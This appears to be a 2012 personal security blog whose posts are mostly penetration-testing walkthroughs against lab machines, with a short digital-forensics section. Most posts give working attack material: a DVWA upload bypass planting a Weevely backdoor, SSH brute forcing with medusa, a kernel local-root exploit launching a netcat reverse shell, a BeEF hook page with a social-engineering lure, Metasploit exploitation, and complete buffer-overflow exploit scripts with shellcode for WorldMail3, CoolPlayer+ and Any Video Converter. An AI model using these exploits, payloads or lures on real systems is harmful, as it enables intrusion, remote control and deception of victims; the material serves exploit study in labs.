SECURITY

Monday, 29 October 2012

How to get pwnOS IP Address

Posted by shinigami at 17:30

Yesterday, I was learn about pwnOS. The vulnerable operating system for penetration testing lab. Then I trying to run the pwnOS in VMware, after booting and login prompt appear any question in my mind. What is the IP address on pwnOS?

Trying to scan from backtrack machine using nmap, but nothing found. Then I try to open pwnOS using virtual box, and then scaning again using nmap and finally I got it. From the problem before, I indicating that VMware doesn't giving IP address on PWNOS before we login into pwnOS system.
But in virtual box, the IP will be given before we login into pwnOS.

So, the conclusion is :

If we are using VM Ware, we need to login into pwnOS system to get the IP address, but
If we are using VirtualBox, we don't need login to get IP address.

Friday, 26 October 2012

Linux Tools for Digital Forensic

Posted by shinigami at 20:04

Here is common tools are used for digital forensic in Linux,

# DD

The DD tool is used for clone the device like hard-drive. DD will clone the device look like the original device. If the size of device is 500GB so the result of clone is 500GB too.
The command for DD clone :

# dd if=/dev/sda of=/tmp/forensic

if : input file
of: output file

# FDISK

Fdisk commonly used for hard drive partition. In digital forensic, you can use fdisk for craving information in the device.

# fdisk -ul /path/of/clonning/device

# MD5SUM

MD5SUM usually used for getting hash of device or file. With md5sum, you can keep the integrity of your digital evidence.
The command for md5sum :

# md5sum file_or_device

# XDD

XDD used for getting the byte offset. Using XDD is easily to get the offset of file.
The command is :

# xxd clone_images

Introduction of Computer Forensic

Posted by shinigami at 19:52

# What is Computer Forensic ?

Definition of Computer Forensic is a proccess to finding, searching, analysis dam collecting the evidence from computer system with the standard forensic and documentation for legal evidence in the court.

# What is Unallocated Space ?

Unallocated Space usually called as "Free Space", is a logical space on hard drive that the operating system. The space not be used by the operating system before formated, the opposite of Unallocated Space commonly called as Allocated Space. The Allocated space is used by operating system for write the data or file.

# What is Slack Space ?

The Slack Space refers are not fully used by the current allocated file and which may be contain data from a previously deleted file. For detail, please see the images below :

Monday, 22 October 2012

Hacking DVWA and got the ROOT

Posted by shinigami at 16:18

Hello All, today I was learn about DVWA. And I want to hack DVWA until got the root. I'm using fitur upload with high security level. Before I have prepared php backdoor that generated using Weevly.

# Create Backdoor with Weevely

Goto terminal, type :

cd /pentest/web/backdoors/weevely

Create backdoor with this command :

./weevely.py generate secret cobasaja.php

See the picture below for detail,

# Upload the Backdoor and Bypass DVWA protection with DVWA

Upload the backdoor which has been created using Weevly.

You will see that the upload failed, ok we can bypass them using BurpSuite.

Open your Burp Suite, and make sure intercept is on

Open your browser, and set proxy into burp suite. 127.0.0.1:8080

Back to DVWA and re-upload the backdoor. Buprsuite will tamper it.

Edit your filename with add .jpg extension.

Next press forward button.

Horray, the backdoor upload successfully...

Now connect your backdoor with our machine, type this command :

./weevely.py http://192.168.56.102/dvwa/hackable/uploads/cobasaja.php.jpg secret

OK, now your machine connected with backdoor.

# ROOTING

Now, I will search available user on target machine.

cat /etc/passwd

Yuhu we got user named msfadmin

I will crack this user with medusa

medusa -h 192.168.56.101 -u msfadmin -P /pentest/passwords/wordlists/darkc0de.lst -e ns -M ssh

* -h : hostname

-u username

-P path of wordlist

-e options password, ns for blank password and username same as password

-M module

Haha, I got password for username msfadmin. "msfadmin" as password for msfadmin

What happened if brute force failed? Huh, we must try to do local exploit. I will use udev exploit for linux kernel. You can download the kernel exploit here

After download the kernel, we need to compile it.

gcc 8572.c -o udev

Now, create script to make target machine connect to our machine with netcat using root access.

echo '#!/bin/bash' > /tmp/run

echo '/bin/netcat -e /bin/bash 192.168.56.102 4444' >> /tmp/run

* please note that 192.168.56.102 is our ip (attacker)

Back to our machine, make our system listen to port 4444

nc -lvp 4444

Check the PID of udev using following command,

cat /proc/net/netlink

You see that the PID is 2441, We will need this PID

Now Back to our exploit, run the compiled exploit followed with the PID

./udev 2441

Goto our netcat, and type id and whoami, you will see that you are got the root

Friday, 19 October 2012

Social Engineering + BeEF + Metasploit, finally pwned

Posted by shinigami at 11:58

Heiyo, today we will learn about pwned victim from browser. My scenario is :

Make user visit our page, with SocialEngineering
Setup BeEF
Setup Metasploit browser_autopwn
Play and Pwned

Ok, lets doing

#1. Social Engineering

Social Engineering with the best plan will result the best thing. I have plan to make link to the target. Of course the link must create interest. In this case I will create page with contain Ayana images (JKT48 personel). She is a beauty girl, so the target victim is Male of course. Hehe
Prepare the Ayana images, named cantik.jpg
Lets create the page with code below :

<html>
<head>
<title>Ayana.jpg</title>
<script src="http://192.168.56.101:3000/hook.js"></script> <!-- file JS from BeEF -->
</head>
<body>
<img src="cantik.jpg" />
</body>
</html>

Save as this file with named index.html
Place the file into this directory /var/www/ayana.jpg/
* 192.168.56.101 is our ip address (attacker machine)
* ayana.jpg is directory, its to make the uri look a like addressed to images file.

Run your apache service, to make it work.

#2. Setup BeEF

Run the BeEF from Backtrack Tools->Exploitation->Social Engineering->BeEF
Open the panel of BeEF using your browser here http://127.0.0.1:3000/ui/panel
Now, give the target address http://192.168.56.101/ayana.jpg
You can use your favorite technique to gives the link, may be you can say that "Hei bro, look the beautiful girl here http://192.168.56.101/ayana.jpg"
Back into BeEF panel to monitor your target.

Here, my target running Windows XP SP3 with IE 8 installed.

#3. Setup Metasploit browser_autopwn

Before I have read about browser_autopwn on metasploit (here), so I have idea to do that on my scenario.
Open msfconsole, then type :
msf > use auxiliary/server/browser_autopwn

Show the options for this auxiliary, type :
msf auxiliary(browser_autopwn) > show options

set the LHOST with our IP address (attacker machine), type:
msf auxiliary(browser_autopwn) > set LHOST 192.168.56.101

Run the auxiliary, type :
msf auxiliary(browser_autopwn) > run

Wait until you see that

At this point, we need to notes the exploit address. http://192.168.56.101/paVleLsD
* 192.168.56.101 is our ip (attacker machine)

#4. Lets play the game

Ok, the resume of scenarios is :
- Give the target some of url with contain images. http://192.168.56.101/ayana.jpg
When vitctim access this page, he/she will see it :

- After that, back into BeEF panel and see what happens on that

The attacker was connected to BeEF with IE 8. Now redirect the victim into metasploit. See the image below for detail.

As we can see that the metasploit was successfully gaining access into windows system.

Now, check the session on metasploit with command :

sessions -l

Connect to windows using meterpreter. Type :

sessions -i 2

* 2 is id of sessions on metasploit

Wednesday, 17 October 2012

Metasploitable 2 has been pWned - Part 2

Posted by shinigami at 01:00

After posting about pentest on Metasploitable v.2 (here), I will continue to attack again on machine target using result from Nmap scanning before. You can see the available service here.
Ok, in this post the target service is Unreal IRCd.

Run the Metasploit
Search exploit for Unreal IRCd using metasploit

# msf > search unreal irc

It will returned :

exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12 00:00:00 UTC  excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution

Now, use the exploit above

# msf > use exploit/unix/irc/unreal_ircd_3281_backdoor

See what the available configuration for this exploit

# msf exploit(unreal_ircd_3281_backdoor) > show options
It will returned,

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
RPORT  6667             yes       The target port


Exploit target:

Id  Name
--  ----
0   Automatic Target

Set the RHOST,

# msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.56.103

Show the available payloads,

# msf exploit(unreal_ircd_3281_backdoor) > show payloads
returned:

ompatible Payloads
===================

   Name                     Disclosure Date  Rank    Description
   ----                     ---------------  ----    -----------
   cmd/unix/bind_perl                        normal  Unix Command Shell, Bind TCP (via Perl)
   cmd/unix/bind_perl_ipv6                   normal  Unix Command Shell, Bind TCP (via perl) IPv6
   cmd/unix/bind_ruby                        normal  Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/bind_ruby_ipv6                   normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
   cmd/unix/generic                          normal  Unix Command, Generic Command Execution
   cmd/unix/reverse                          normal  Unix Command Shell, Double reverse TCP (telnet)
   cmd/unix/reverse_perl                     normal  Unix Command Shell, Reverse TCP (via Perl)
   cmd/unix/reverse_ruby                     normal  Unix Command Shell, Reverse TCP (via Ruby)

I will use cmd/unix/reverse for telnet connection,

# msf exploit(unreal_ircd_3281_backdoor) > set PAYLOAD cmd/unix/reverse

See the configuration for the payload,

# msf exploit(unreal_ircd_3281_backdoor) > show payloads
returned,

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.56.103   yes       The target address
   RPORT  6667             yes       The target port


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

Set the LHOST with our IP Address

# msf exploit(unreal_ircd_3281_backdoor) > set LHOST 192.168.56.101
Now, launch the exploit

# msf exploit(unreal_ircd_3281_backdoor) > exploit
OK, wait for a minute and you will bringing into linux shell... type uname -a for test

# uname -a

Metasploitable 2 has been PWNED with Metasploit

Posted by shinigami at 00:09

Hi All, today I want to share about how to pwned Metasploitable v2.
You can download metasploitable v2 here http://sourceforge.net/projects/metasploitable/files/Metasploitable2/
After installing Metasploitable 2 on Virtual machine, We will start to the step of pentest.

Scan the running service on target machine
Here, I'm using Nmap to do this job

# nmap -sV -A 192.168.56.103
I got this information about the services

Starting Nmap 6.01 ( http://nmap.org ) at 2012-10-17 17:18 EDT
Nmap scan report for 192.168.56.103
Host is up (0.00097s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open shell?
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open ingreslock?
2049/tcp open nfs (nfs V2-4) 2-4 (rpc #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
Ok, to many service. I will try VSFTPd 2.3.4
Run your Metasploit, and search the exploit for VSFTPd 2.3.4
Use the search command on Metasploit

# msf> search vsftpd
It will return

exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 00:00:00 UTC excellent VSFTPD v2.3.4 Backdoor Command Execution
Use the exploit above,

# msf> use exploit/unix/ftp/vsftpd_234_backdoor
Setting the exploit,

# msf exploit(vsftpd_234_backdoor) > show options
Set the RHOST with the IP Target

# msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.56.103
Show the available PAYLOAD,

# msf exploit(vsftpd_234_backdoor) > show payloads
Select the Payload,

# msf exploit(vsftpd_234_backdoor) > set PAYLOAD cmd/unix/interact
Run the Exploit command,

# msf exploit(vsftpd_234_backdoor) > exploit
Wait and you will bring into linux shell. Type uname -a and you will see the kernel of metasploitalbe 2.

Read my next post, Metasploitable 2 pwned with Metasploit - Part 2

Friday, 12 October 2012

Why POP POP RETN ?

Posted by shinigami at 06:52

When learning about bypass SafeSEH protection, often meet with command POP POP RETN.
whether is POP POP RETN ?
based my knowledge, this commands are the popular method to bypass safeseh. Commonly, memory is contain memory 32bit or 4byte virtual file. POP command first will remove the value of the top from virtual file into other memory register, and then the second POP command will remove the value of the second virtual file into other memory, and finally the RETN command will be the first stack. So the system will be execute command based on memory address on RETN.

May be you will more understand about POP POP RETN after see the image above

Qualcom WorldMail3 Buffer Overflow

Posted by shinigami at 06:41

Today I want to learn about buffer overflow on Qualcom Worldmail3.
First, I make fuzzer using vulnerable character and command :

a001 LIST }

My fuzzer look like this :

#!/usr/bin/python
import socket
buffer = "\x41" * 800
exploit = "a001 LIST " + buffer + "}" + "\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.101",143))
s.recv(1024)
s.send(exploit)
s.close()

Open Ollydbg and attach IMAP4.exe
Application crash? If yes, now goto View->SEH Cain, and press Shift+F9. EIP has been overwrite.
Now time for getting offset, in this case I have found that the offset is 774. So, modify the fuzzer again. Btw you need to restart your Windows.

#!/usr/bin/python
import socket
buffer = "\x41" * 774
buffer += "\xcc" * 4
buffer += "\x41" * (800-len(buffer))
exploit = "a001 LIST " + buffer + "}" + "\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.101",143))
s.recv(1024)
s.send(exploit)
s.close()

Run the Ollydbg and attach IMAP4, then re-run the fuzzer.
What you see? EIP was overwrite with CCCCCC, it's mean that the offset is accurate.
Check the module which not protected by safeseh, in this case the mailcmn.dll is not protected.
Now search the POP POP RETN opcode, please note that the address is not contain 00,0a and 0d.
Now edit the fuzzer for setup the payload :

#!/usr/bin/python
import socket
import os
import time
shellcode = "w00tw00t"
shellcode += ("\xb8\x1d\x77\xf6\x2c\xda\xca\x31\xc9\xb1\x51\xd9\x74\x24\xf4\x5a"
"\x31\x42\x12\x03\x42\x12\x83\xf7\x8b\x14\xd9\xfb\x1e\x32\x6f\xeb"
"\x26\x3b\x8f\x14\xb8\x4f\x1c\xce\x1d\xdb\x98\x32\xd5\xa7\x27\x32"
"\xe8\xb8\xa3\x8d\xf2\xcd\xeb\x31\x02\x39\x5a\xba\x30\x36\x5c\x52"
"\x09\x88\xc6\x06\xee\xc8\x8d\x51\x2e\x02\x60\x5c\x72\x78\x8f\x65"
"\x26\x5b\x58\xec\x23\x28\xc7\x2a\xad\xc4\x9e\xb9\xa1\x51\xd4\xe2"
"\xa5\x64\x01\x1f\xfa\xed\x5c\x73\x26\xee\x3f\x48\x17\xd5\xa4\xc5"
"\x1b\xd9\xaf\x99\x97\x92\xc0\x05\x05\x2f\x60\x3d\x0b\x58\xef\x73"
"\xbd\x74\xbf\x74\x17\xe2\x13\xec\xf0\xd8\xa1\x98\x77\x6c\xf4\x07"
"\x2c\x6d\x28\xdf\x07\x7c\x35\x24\xc8\x80\x10\x05\x61\x9b\xfb\x38"
"\x9c\x6c\x06\x6f\x35\x6f\xf9\x5f\xa1\xb6\x0c\xaa\x9f\x1e\xf0\x82"
"\xb3\xf3\x5d\x79\x67\xb7\x32\x3e\xd4\xc8\x65\xa6\xb2\x27\xda\x40"
"\x10\xc1\x03\x19\xfe\x75\xd9\x51\x38\x22\x21\x47\xac\xdd\x8c\x32"
"\xce\x0e\x46\x18\x9d\x81\x7e\x37\x21\x0b\xd3\xe2\x22\x64\xbc\xe9"
"\x94\x03\x74\xa6\xd9\xda\xd7\x1c\x72\xb6\x28\x4c\xe9\x50\x30\x15"
"\xc8\xd8\xe9\x1a\x02\x4f\xe9\x34\xcd\x1a\x71\xd2\x7a\xb8\x14\x93"
"\x9e\x54\xb7\xfa\x49\x65\xbe\x1b\xe3\x31\x48\x01\xc5\x79\xb9\x6f"
"\xd8\x38\x13\x91\x67\x91\xf8\xe0\x12\xd1\x55\x51\x49\x49\xd8\x5b"
"\x3d\x9c\xe3\xd6\x06\x5e\xcd\x43\xd0\xf2\xa3\x22\x8f\x98\x42\x95"
"\x7e\x08\x14\xea\x51\xda\x3b\xcd\x57\xd5\x17\x12\x81\x83\x68\x13"
"\x19\xab\x47\x60\x31\xaf\xeb\xb2\xda\xb0\x3a\x68\xdc\x9f\xab\xf2"
"\xfa\xc2\x5f\x59\x04\xd4\x5f\x8d") #bad char 00,0a,0d,
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
buffer = "\x90" * (738-len(shellcode))
buffer += shellcode
buffer += "\x90" * 32
buffer += "\xeb\x06\x90\x90"
buffer += "\x4e\x3b\x01\x10"
buffer += egghunter
buffer += "\x90" * (800-len(buffer))
exploit = "a001 LIST " + buffer + "}" + "\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.101",143))
s.recv(1024)
s.send(exploit)
s.close()
print "Waiting for 10 sec ..."
time.sleep(10) #waiting until egghunter proses done, please be patient
print "Try to connect ..."
os.system("telnet 192.168.56.101 4444")

OK, run again the fuzzer. and I got this

Monday, 8 October 2012

Buffer Overflow CoolPlayer+ Portable 2.19.2

Posted by shinigami at 12:54

Today I learn buffer overflow CoolPlayer+ Portable 2.19.2. This is a Audio Player for windows. I need to prepare some tools for exploitation.

Windows XP SP 3 English
Ollydbg
Metasploit
Geany text editor

First, I will create fuzzer. Step by step the fuzzer from 100 until 1000. When fuzzer size 100 byte, the application crash but, the stack space for payload is to small. So I trying to place 1000 fuzzer, and the result is the application crash too and the stack space is enough.

#!C:\Python27\python.exe

########################################
## Information Security Shinobi Camp #
## http://is2c-dojo.com #
## http://scx020c07c.blogspot.com #
########################################

# How to use
# fuzzer.py playme.m3u "\x41" 1000

import sys
filename = sys.argv[1]
my_args = sys.argv[2]
long_args= int(sys.argv[3])

sploit = my_args * long_args

fopen = open(filename,'w')
fopen.write(sploit)

Run the fuzzer, open the playlist using Cool Player and look at the EIP. The EIP was overwriten.
After making EIP overwrite, I need to know where the EIP overwriten exactly.
Use metasploit pattern_create to check it,

./pattern_create.rb 1000

edit the fuzzer

#!C:\Python27\python.exe
########################################
## Information Security Shinobi Camp #
## http://is2c-dojo.com #
## http://scx020c07c.blogspot.com #
########################################
filename = "playme.m3u"
junk = ".....pattern_create......"
sploit = junk
fopen = open(filename,'w')
fopen.write(sploit)

Now, re-run the fuzzer. Reopen the ollydbg and attach the Coolplayer. Load the playme.m3u again.
Look at the EIP, copy the value and check using pattern_offset of metasploit tools

./pattern_offset.rb 30684139

and return value 209. Now back into fuzzer and edit look like this :

#!C:\Python27\python.exe
########################################
## Information Security Shinobi Camp #
## http://is2c-dojo.com #
## http://scx020c07c.blogspot.com #
########################################
filename = "playme.m3u"
junk = "\x90" * 209
junk += "\xEF\xBE\xAD\xDE"
junk += "\x41" * (1000-len(junk))
sploit = junk
fopen = open(filename,'w')
fopen.write(sploit)

Run the fuzzer, restart Olly and Coolplayer. Then load playme.m3u again. Make sure that the EIP was overwritten with DEADBEEF.
Then we need module that having opcode JMP ESP.
Click View->Executable Module, double click SHELL32.dll. Search the JMP ESP, Click right->Search For->Command, insert JMP ESP. Please note the address of JMP ESP.

Back into CPU right block, Click in the ESP and Right click Follow in Dump.

We can see that the space for payload is enough for Execute Command Payload. So I will use it.
Generate payload using metasploit and the bad characters is 00,0a,0d
Edit the fuzzer again :

#!C:\Python27\python.exe
junk = "\x90" * 209
junk += "\xD7\x30\x9D\x7C" # JMP ESP
junk += "\x90" * 16
junk += ("\xba\x90\x6e\xa9\x03\xdb\xc1\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x32\x83\xc3\x04\x31\x53\x0e\x03\xc3\x60\x4b\xf6\x1f\x94\x02"
"\xf9\xdf\x65\x75\x73\x3a\x54\xa7\xe7\x4f\xc5\x77\x63\x1d\xe6"
"\xfc\x21\xb5\x7d\x70\xee\xba\x36\x3f\xc8\xf5\xc7\xf1\xd4\x59"
"\x0b\x93\xa8\xa3\x58\x73\x90\x6c\xad\x72\xd5\x90\x5e\x26\x8e"
"\xdf\xcd\xd7\xbb\x9d\xcd\xd6\x6b\xaa\x6e\xa1\x0e\x6c\x1a\x1b"
"\x10\xbc\xb3\x10\x5a\x24\xbf\x7f\x7b\x55\x6c\x9c\x47\x1c\x19"
"\x57\x33\x9f\xcb\xa9\xbc\xae\x33\x65\x83\x1f\xbe\x77\xc3\xa7"
"\x21\x02\x3f\xd4\xdc\x15\x84\xa7\x3a\x93\x19\x0f\xc8\x03\xfa"
"\xae\x1d\xd5\x89\xbc\xea\x91\xd6\xa0\xed\x76\x6d\xdc\x66\x79"
"\xa2\x55\x3c\x5e\x66\x3e\xe6\xff\x3f\x9a\x49\xff\x20\x42\x35"
"\xa5\x2b\x60\x22\xdf\x71\xee\xb5\x6d\x0c\x57\xb5\x6d\x0f\xf7"
"\xde\x5c\x84\x98\x99\x60\x4f\xdd\x56\x2b\xd2\x77\xff\xf2\x86"
"\xca\x62\x05\x7d\x08\x9b\x86\x74\xf0\x58\x96\xfc\xf5\x25\x10"
"\xec\x87\x36\xf5\x12\x34\x36\xdc\x70\xdb\xa4\xbc\x76")

sploit = junk

fopen = open("playme.m3u",'w')
fopen.write(sploit)
fopen.close()

Rerun the fuzzer, open coolplayer and load the playme.m3u again. Look the Coolplayer was crash and calculator appear.

Friday, 5 October 2012

Buffer Overflow Any Video Converter

Posted by shinigami at 21:18

In this section We will learn how to exploit on Any Video Converter. First, we must find out the vulnerability of application which can attack using buffer overflow. This case, I was founds that profiles_v2.xml is vulnerable. So we need to create fuzzer for look like profiles_v2.xml

#!C:\Python27\python.exe
filename = "profiles_v2.xml"
buffer = "\x41" * 1000
header = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?>\n"
header += "<root>\n"
header += "<categories>\n"
header += "<category name=\""+buffer+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"Lorem ipsum dolor\"/>\n"
header += "</categories>\n"
header += "<groups></groups>\n"
header += "<profiles></profiles>\n"
header += "</root>\n"

sploit = header
fopen = open(filename,'w') # write file
fopen.write(sploit) # insert buffer into file
fopen.close() # close file

Run the fuzzer, it will generating file named "profiles_v2.xml", copy this file into root directory of Any Video Converter.

Open Any Video Converter using Ollydbg, and press F9.

Look at the ESP stack, stack contains "A" characters. To bypass the SEH, click View->SEH Cain and press Shift+F9. Your EIP will be overwrite.

To know where is exactly the EIP overwrite, I will use tools from metasploit.

./pattern_create.rb 1000

Edit your fuzzer with pattern.

#!C:\Python27\python.exe
filename = "profiles_v2.xml"
buffer = "\xAF\xDE\x20\x3E............."
header = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?>\n"
header += "<root>\n"
header += "<categories>\n"
header += "<category name=\""+buffer+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"Lorem ipsum dolor\"/>\n"
header += "</categories>\n"
header += "<groups></groups>\n"
header += "<profiles></profiles>\n"
header += "</root>\n"
sploit = header
fopen = open(filename,'w') # write file
fopen.write(sploit) # insert buffer into file
fopen.close() # close file

Run the fuzzer again, copy the result into AnyVideo Converter directory and load the application with Ollydbg then press F9.

Bypass the SEH, click View->SEH Cain and press Shift+F9. Please note the value of EIP.

To check the byte of EIP was overwritten, open pattern _offset.

./pattern_offset.rb the_value_of_eip

Now we must check the module which used by application where does't compile with SEH Handler.

I choose dvcapture.dll , to verify that not compile using SEH Handler

./msfpescan -i dvcapture.dll | grep DllCharacteristics

if return 0x0000000 it means that module not compiled with SEHandler

./msfpescan -i dvcapture.dll | grep SEHandler

if return nothing, it means that module not compiled with SEHandler

On the Ollydbg, click View->Executable Module, and select dvcapture.dll then right click->Search For->Sequence Command->POP r32 POP r32 RETN

Note the address of first POP.
Back into fuzzer and edit :

#!C:\Python27\python.exe
filename = "profiles_v2.xml"
buffer = "\x90" * 328
buffer += "\xeb\x06\x90\x90" #JMP Short bypass SEH
buffer +="\x33\xE6\x01\x10" #Address of SEH
buffer += "\x90" * (1000-len(buffer))
header = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?>\n"
header += "<root>\n"
header += "<categories>\n"
header += "<category name=\""+buffer+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"Lorem ipsum dolor\"/>\n"
header += "</categories>\n"
header += "<groups></groups>\n"
header += "<profiles></profiles>\n"
header += "</root>\n"

sploit = header
fopen = open(filename,'w') # write file
fopen.write(sploit) # insert buffer into file
fopen.close() # close file

Run your fuzzer, copy the result into AnyVideo Conv directory and load application using Ollydbg.

click View->SEH Cain and press Shift+F9 look at the EIP value, trying to load dvcapture.dll ? If yes the fuzzer is succesfully.

Now, passed the payload into fuzzer...
Please notes the Bad Characters are 00,0a,0d,22,25,26,3e

#!C:\Python27\python.exe
filename = "profiles_v2.xml"
buffer = "\x90" * 328
buffer += "\xeb\x06\x90\x90"
buffer +="\x33\xE6\x01\x10"
#PAYLOAD Bind Shell
buffer += ("\x2b\xc9\xb1\x51\xdb\xd3\xd9\x74\x24\xf4\xbf\x05\xa5\x63\x91\x58"
"\x31\x78\x13\x83\xc0\x04\x03\x7d\xaa\x81\x64\x81\xde\xae\xca\x91"
"\xe6\xce\x2a\x9e\x79\xba\xb9\x44\x5e\x37\x04\xb8\x15\x3b\x82\xb8"
"\x28\x2b\x07\x77\x33\x38\x47\xa7\x42\xd5\x31\x2c\x70\xa2\xc3\xdc"
"\x48\x74\x5a\x8c\x2f\xb4\x29\xcb\xee\xff\xdf\xd2\x32\x14\x2b\xef"
"\xe6\xcf\xfc\x7a\xe2\x9b\xa2\xa0\xed\x70\x3a\x23\xe1\xcd\x48\x6c"
"\xe6\xd0\xa5\x91\x3a\x58\xb0\xf9\x66\x42\xa2\xc2\x56\xa1\x40\x4f"
"\xdb\x65\x02\x0f\xd0\x0e\x64\x93\x45\x9b\xc5\xa3\xcb\xf4\x4b\xfd"
"\xfd\xe8\x04\xfe\xd4\x97\xf7\x66\xb1\x64\xca\x0e\x36\xf8\x18\x91"
"\xec\x01\x8c\x45\xc6\x13\xd1\xae\x88\x14\xfc\x8f\xa1\x0e\x67\xae"
"\x5f\xd8\x6a\xe5\xf5\xdb\x95\xd5\x62\x05\x60\x20\xdf\xe2\x8c\x1c"
"\x73\x5e\x20\xf3\x27\x23\x95\xb0\x94\x5c\xc9\x50\x73\xb2\xb6\xfa"
"\xd0\x3d\xa7\x97\xbf\x99\x32\xe7\xf8\xb5\xbd\xd1\x6d\x2a\x13\x88"
"\x8e\x9a\xfb\x96\xdc\x35\x15\x81\xe1\x9c\xb6\x78\xe1\xf1\x51\x67"
"\x54\x74\xe8\x30\x98\xae\xbb\xea\x32\x1a\xc3\xc2\x28\xcc\xdc\x9b"
"\x88\x74\x74\xa4\xc3\xd2\x85\x8a\x8a\xb6\x1d\x4c\x3b\x24\xb3\x19"
"\x5e\xc0\x1b\x40\x88\xd9\x15\x95\xa0\xa5\xac\xbb\x04\xe6\x5c\x91"
"\x99\xa4\x8f\x1b\x27\x05\x43\x6e\xd2\x6d\xc8\xdb\x88\xe6\x7c\xe5"
"\x7c\xe0\x7f\x6c\xc7\xf2\x56\xd5\x90\x5e\x06\xb8\x4f\x35\xa9\x6b"
"\x21\x9c\xf8\x74\x11\x76\x56\x53\x97\x49\xfb\x9c\x4e\x3f\x03\x9d"
"\x58\x3f\x2b\xea\xf0\x43\x4f\x28\x9a\x44\x86\xe2\x9c\x6b\x4f\x7c"
"\xbb\x6e\xe3\xd3\xc4\xb9\xfb\x03")
buffer += "\x90" * (1000-len(buffer))
header = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?>\n"
header += "<root>\n"
header += "<categories>\n"
header += "<category name=\""+buffer+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"Lorem ipsum dolor\"/>\n"
header += "</categories>\n"
header += "<groups></groups>\n"
header += "<profiles></profiles>\n"
header += "</root>\n"

sploit = header
fopen = open(filename,'w') # write file
fopen.write(sploit) # insert buffer into file
fopen.close() # close file

Run fuzzer, copy file into AnyVideo Converter directory, and Run the application.

Back into backtrack, open terminal and run telnet command:

telnet 192.168.56.101 4444

Okay, you got the windows shell

Thursday, 4 October 2012

Buffer Overflow EZ-Server

Posted by shinigami at 06:36

First install Run EZ-Server and open your browser locate at IP of Machine where EZ-Server running.
In this case my IP is 192.168.56.102 and using port 8000. We will see login form of EZ-Server.
Start from here, we can predicting what commands send into ez-server. I'm using wireshark to capture it.
We got the send packet look like this :

"GET /blablabla....."
head2 = "\r\n\r\n"+"HTTP/1.1"

And I will setup fuzzer into blablabla.

#!/usr/bin/python
import socket
head1 = "GET /"
head2 = "\r\n\r\n"+"HTTP/1.1"
buffer = "\x41" * 10000
sploit = head1 + buffer + head2
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(('192.168.56.102',8000))
sock.send(sploit)
sock.close()

Run our fuzzer and look at the EZ-Server, it crash.
Now open we need to create pattern using metasploit with size 10000 byte.

/pentest/exploits/framework/tools/pattern_create.rb 10000

Back into fuzzer and edit look like this

#!/usr/bin/python
import socket
head1 = "GET /"
head2 = "\r\n\r\n"+"HTTP/1.1"
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa......."
sploit = head1 + buffer + head2
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(('192.168.56.102',8000))
sock.send(sploit)
sock.close()

Open your EZ-Server and attach into Ollydbg, and run your fuzzer again. EZ-Server crash, back into Ollydbg and then click View->SEH Cain, select SEH Cain and press Shift+F9. It will by pass SEH and EIP will overwrite, now note / remember the EIP value.
Check where the byte was overwriten the EIP with metasploit tool.
Offset 48316F48 > 5883

/pentest/exploits/framework/tools/pattern_offset.rb 48316F48
5883

Now, back into fuzzer and edit look like this:

#!/usr/bin/python
import socket
head1 = "GET /"
head2 = "\r\n\r\n"+"HTTP/1.1"
buffer = "\x90" * 5879 #5883 - 4 byte for CCCC
buffer += "\xcc\xcc\xcc\xcc"
buffer += "\x41\x41\x41\x41"
buffer += "\x90" * (10000-len(buffer))
sploit = head1 + buffer + head2
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(('192.168.56.102',8000))
